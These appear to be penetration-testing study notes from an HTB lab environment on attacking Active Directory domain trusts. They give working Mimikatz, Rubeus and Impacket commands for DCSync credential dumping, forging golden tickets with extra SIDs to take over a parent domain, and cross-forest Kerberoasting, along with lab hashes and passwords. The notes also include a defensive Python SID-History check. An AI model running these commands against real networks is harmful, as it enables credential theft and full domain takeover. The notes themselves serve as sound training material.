Enumeration
Import-Module activedirectory
Get-ADTrust -Filter *
Import-Module .\Powerview.ps1
Get-DomainTrust
Get-DomainTrustMapping
Checking Users in the Child Domain using Get-DomainUser
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
Using netdom to query domain trust
netdom query /domain:inlanefreight.local trust
Using netdom to query domain controllers
netdom query /domain:inlanefreight.local dc
Using netdom to query workstations and servers
netdom query /domain:inlanefreight.local workstation
Attacking Domain Trusts - Child/Parent Trusts - from Windows
SID History Primer
This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket-granting ticket (TGT), which will allow us to authenticate as any account in the domain of our choosing for further persistence.
https://www.thehacker.recipes/ad/persistence/sid-history
This attack allows for the compromise of a parent domain once the child domain has been compromised.
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.
Obtaining the KRBTGT Account's NT Hash using Mimikatz
PS C:\htb> mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
Get-DomainSID
We can use the PowerView Get-DomainSID function to get the SID for the child domain, but this is also visible in the Mimikatz output above.
PS C:\htb> Import-Module .\Powerview.ps1
PS C:\htb> Get-DomainSID
S-1-5-21-2806153819-209893948-922872689
Obtaining Enterprise Admins Group's SID using Get-DomainGroup
# using activedirectory module
Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"
# using powerview
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: hacker
The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519
Creating Golden Ticket with Mimikatz
PS C:\htb> mimikatz.exe
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
Creating a Golden Ticket with Rubeus (confirm it is in memory afterwards using klist)
PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
PS C:\Tools> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCA
Attacking Domain Trusts - Child/Parent Trusts - from Linux
We'll still need to gather the same bits of information.
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up..
lookupsid.py logistics.inlanefreight.local/[email protected]
Password:
[*] Brute forcing SIDs at 172.16.5.240
[*] StringBinding ncacn_np:172.16.5.240[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
Looking for the Domain SID
lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
Password:
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
Grabbing the Domain SID & Attaching to Enterprise Admin's RID
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
Password:
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: INLANEFREIGHT\administrator (SidTypeUser)
501: INLANEFREIGHT\guest (SidTypeUser)
502: INLANEFREIGHT\krbtgt (SidTypeUser)
512: INLANEFREIGHT\Domain Admins (SidTypeGroup)
513: INLANEFREIGHT\Domain Users (SidTypeGroup)
514: INLANEFREIGHT\Domain Guests (SidTypeGroup)
515: INLANEFREIGHT\Domain Computers (SidTypeGroup)
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup)
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias)
518: INLANEFREIGHT\Schema Admins (SidTypeGroup)
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)
The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
The name of a target user in the child domain (does not need to exist!): hacker
The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519
Constructing a Golden Ticket using ticketer.py
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
...
[*] Saving ticket in hacker.ccache
export KRB5CCNAME=hacker.ccache
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
Cross-Forest Kerberoasting
Enumerating Accounts for Associated SPNs Using Get-DomainUser
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
samaccountname
--------------
krbtgt
mssqlsvc
Enumerating the mssqlsvc Account
PS C:\htb> Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof
samaccountname memberof
-------------- --------
mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
Performing a Kerberoasting Attack with Rubeus Using the /domain Flag
PS C:\htb> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
[*] Total kerberoastable users : 1
[*] SamAccountName : mssqlsvc
[*] DistinguishedName : CN=mssqlsvc,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
[*] ServicePrincipalName : MSSQLsvc/sql01.freightlogstics:1433
[*] PwdLastSet : 3/24/2022 12:47:52 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstics:*$<SNIP>
Admin Password Re-Use & Group Membership
From time to time, we'll run into a situation where there is a bidirectional forest trust managed by admins from the same company.
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
GroupDomain : FREIGHTLOGISTICS.LOCAL
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain : FREIGHTLOGISTICS.LOCAL
MemberName : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGISTICS,DC=LOCAL
PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500
INLANEFREIGHT\administrator
PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator
PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all
Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCA
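The SID History walk-through above and the foreign security principal found with Get-DomainForeignGroupMember come down to the same defender's check: a SID whose domain prefix is not the local domain's SID and whose RID is a privileged one (519 for Enterprise Admins, 500 for Administrator). The Python below is an added example, not code from the page or from HTB; it applies that check to both cases using the domain SIDs shown on this page, and the FREIGHTLOGISTICS domain SID is a constructed placeholder because the page never shows it.

```python
import re

# Well-known domain-relative RIDs a defender cares about in trust abuse.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# A domain SID (S-1-5-21-x-y-z) followed by exactly one RID.
_SID_WITH_RID = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")


def split_domain_sid(sid):
    """Return (domain_sid, rid) for a domain-relative SID, else None."""
    m = _SID_WITH_RID.match(sid)
    if m is None:
        return None
    rid_text = m.group(1)
    return sid[: -(len(rid_text) + 1)], int(rid_text)


def foreign_privileged_sids(local_domain_sid, sids):
    """Flag SIDs from another domain that carry a privileged RID.

    `sids` may be a user's sIDHistory values, a ticket's ExtraSids, or the
    members of a privileged group (foreign security principals appear as raw
    SIDs). Returns (sid, foreign_domain_sid, well_known_name) tuples.
    """
    hits = []
    for sid in sids:
        parsed = split_domain_sid(sid)
        if parsed is None:  # builtin SIDs such as S-1-5-32-544 are skipped
            continue
        domain_sid, rid = parsed
        if domain_sid != local_domain_sid and rid in PRIVILEGED_RIDS:
            hits.append((sid, domain_sid, PRIVILEGED_RIDS[rid]))
    return hits


# Domain SIDs taken from this page.
CHILD_SID = "S-1-5-21-2806153819-209893948-922872689"   # LOGISTICS
ROOT_SID = "S-1-5-21-3842939050-3880317879-2865463114"  # INLANEFREIGHT
# Constructed placeholder: the page does not show the FREIGHTLOGISTICS domain SID.
FREIGHT_SID = "S-1-5-21-111111111-222222222-333333333"

if __name__ == "__main__":
    # Case 1: a LOGISTICS principal whose SID History carries the root domain's RID 519.
    print(foreign_privileged_sids(CHILD_SID, [CHILD_SID + "-1109", ROOT_SID + "-519"]))
    # Case 2: FREIGHTLOGISTICS Administrators containing INLANEFREIGHT's RID 500.
    print(foreign_privileged_sids(FREIGHT_SID, [FREIGHT_SID + "-500", ROOT_SID + "-500"]))
```

Within a forest, SID History is honoured across the child/parent trust, which is why case 1 is not stopped by the trust itself and has to be caught by auditing sIDHistory and ticket contents; across a forest trust, SID filtering drops such SIDs unless it has been disabled.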
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
Cross-Forest Kerberoasting
GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Hunting Foreign Group Membership with Bloodhound-python
cat /etc/resolv.conf
# run "resolvectl status" to see details about the actual nameservers.
#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2
cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.
#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain FREIGHTLOGISTICS.LOCAL
nameserver 172.16.5.238
bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u [email protected] -p Klmcargo
Upload both data sets (first and second domain) to BloodHound and select the pre-built query:
Users with Foreign Domain Group Membership